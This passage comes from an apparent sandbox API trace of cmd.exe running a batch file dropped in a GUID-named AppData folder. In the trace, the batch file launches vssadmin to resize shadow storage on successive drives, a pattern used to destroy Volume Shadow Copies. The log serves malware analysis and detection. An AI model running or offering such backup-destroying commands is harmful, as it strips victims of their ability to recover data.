dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x281 [0036.165] GetProcessHeap () returned 0x3e0000 [0036.165] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0036.165] GetProcessHeap () returned 0x3e0000 [0036.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0036.165] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f81f8 [0036.165] GetProcessHeap () returned 0x3e0000 [0036.165] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0036.165] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x78) returned 0x3f0ee0 [0036.165] _tell (_FileHandle=3) returned 641 [0036.166] _close (_FileHandle=3) returned 0 [0036.166] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0036.166] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0036.166] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0036.166] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0036.166] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0036.166] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0036.166] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0036.166] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0036.166] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0036.166] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0036.166] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0036.166] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0036.166] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0036.166] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0036.166] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0036.166] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0036.166] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0036.166] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0036.166] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0036.166] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0036.166] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0036.166] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0036.166] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0036.166] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0036.166] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0036.166] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0036.166] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0036.166] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0036.166] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0036.166] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0036.166] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0036.167] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0036.167] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0036.167] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0036.167] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0036.167] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0036.167] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0036.167] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0036.167] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0036.167] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0036.167] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0036.167] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0036.167] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0036.167] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0036.167] SetErrorMode (uMode=0x0) returned 0x1 [0036.167] GetProcessHeap () returned 0x3e0000 [0036.167] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0036.167] GetProcessHeap () returned 0x3e0000 [0036.167] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0036.167] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.167] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.167] GetProcessHeap () returned 0x3e0000 [0036.167] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0036.167] GetProcessHeap () returned 0x3e0000 [0036.167] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0036.167] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0036.167] GetProcessHeap () returned 0x3e0000 [0036.167] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0036.167] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.167] GetProcessHeap () returned 0x3e0000 [0036.167] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f6fb8 [0036.167] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6fb8, Size=0x76) returned 0x3f6fb8 [0036.168] GetProcessHeap () returned 0x3e0000 [0036.168] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6fb8) returned 0x76 [0036.168] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.168] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.168] GetLastError () returned 0x2 [0036.168] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.168] GetLastError () returned 0x2 [0036.168] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.168] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0036.168] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0036.168] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.168] GetLastError () returned 0x2 [0036.168] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0036.168] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0036.169] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.169] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.169] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.169] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7038 [0036.169] GetProcessHeap () returned 0x3e0000 [0036.169] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x8a) returned 0x3f7250 [0036.169] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4280 [0036.169] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f4288, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0036.169] SetErrorMode (uMode=0x0) returned 0x1 [0036.169] GetProcessHeap () returned 0x3e0000 [0036.169] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4280, Size=0x66) returned 0x3f4280 [0036.169] GetProcessHeap () returned 0x3e0000 [0036.169] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4280) returned 0x66 [0036.169] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.169] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.169] GetProcessHeap () returned 0x3e0000 [0036.169] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72e8 [0036.169] GetProcessHeap () returned 0x3e0000 [0036.169] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7410 [0036.169] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7410, Size=0x122) returned 0x3f7410 [0036.169] GetProcessHeap () returned 0x3e0000 [0036.169] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7410) returned 0x122 [0036.169] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.169] GetProcessHeap () returned 0x3e0000 [0036.169] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7540 [0036.169] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7540, Size=0x76) returned 0x3f7540 [0036.170] GetProcessHeap () returned 0x3e0000 [0036.170] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7540) returned 0x76 [0036.170] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.170] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.170] GetLastError () returned 0x2 [0036.170] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.170] GetLastError () returned 0x2 [0036.170] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.170] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0036.170] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0036.170] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.170] GetLastError () returned 0x2 [0036.170] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0036.170] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0036.171] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.171] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.171] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.171] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0036.171] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0036.171] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0036.171] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.171] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.172] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.172] GetProcessHeap () returned 0x3e0000 [0036.172] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0036.172] GetProcessHeap () returned 0x3e0000 [0036.172] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0036.172] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.172] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xac4, dwThreadId=0xac8)) returned 1 [0036.176] CloseHandle (hObject=0x74) returned 1 [0036.176] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.176] GetProcessHeap () returned 0x3e0000 [0036.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.176] GetEnvironmentStringsW () returned 0x3f8408* [0036.176] GetProcessHeap () returned 0x3e0000 [0036.177] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.177] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.177] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0036.297] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0036.297] CloseHandle (hObject=0x78) returned 1 [0036.297] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0036.298] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0036.298] GetProcessHeap () returned 0x3e0000 [0036.298] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.298] GetEnvironmentStringsW () returned 0x3f8408* [0036.298] GetProcessHeap () returned 0x3e0000 [0036.298] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.298] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.298] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0036.298] GetProcessHeap () returned 0x3e0000 [0036.298] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.298] GetEnvironmentStringsW () returned 0x3f8408* [0036.298] GetProcessHeap () returned 0x3e0000 [0036.298] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.298] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.298] GetProcessHeap () returned 0x3e0000 [0036.298] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0036.298] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0036.298] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.298] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0036.299] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.299] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0036.299] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.299] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0036.299] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.299] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0036.299] SetConsoleInputExeNameW () returned 0x1 [0036.299] GetConsoleOutputCP () returned 0x1b5 [0036.299] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0036.299] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.300] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0036.300] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0036.300] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.300] SetFilePointer (in: hFile=0x78, lDistanceToMove=641, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x281 [0036.300] GetProcessHeap () returned 0x3e0000 [0036.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7540 | out: hHeap=0x3e0000) returned 1 [0036.300] GetProcessHeap () returned 0x3e0000 [0036.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7410 | out: hHeap=0x3e0000) returned 1 [0036.300] GetProcessHeap () returned 0x3e0000 [0036.300] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72e8 | out: hHeap=0x3e0000) returned 1 [0036.300] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4280 | out: hHeap=0x3e0000) returned 1 [0036.301] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7250 | out: hHeap=0x3e0000) returned 1 [0036.301] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7038 | out: hHeap=0x3e0000) returned 1 [0036.301] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0036.301] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0036.301] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0036.301] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0036.301] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f0ee0 | out: hHeap=0x3e0000) returned 1 [0036.301] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0036.301] GetProcessHeap () returned 0x3e0000 [0036.301] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0036.301] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.301] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x281 [0036.301] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1640, lpOverlapped=0x0) returned 1 [0036.301] SetFilePointer (in: hFile=0x78, lDistanceToMove=702, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2be [0036.301] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=61, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\ned\r\n") returned 61 [0036.301] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.301] GetFileType (hFile=0x78) returned 0x1 [0036.302] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.302] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2be [0036.302] GetProcessHeap () returned 0x3e0000 [0036.302] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0036.302] GetProcessHeap () returned 0x3e0000 [0036.302] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0036.302] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0036.302] GetProcessHeap () returned 0x3e0000 [0036.302] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0036.302] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x70) returned 0x3f3ff0 [0036.302] _tell (_FileHandle=3) returned 702 [0036.302] _close (_FileHandle=3) returned 0 [0036.302] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0036.302] _wcsicmp 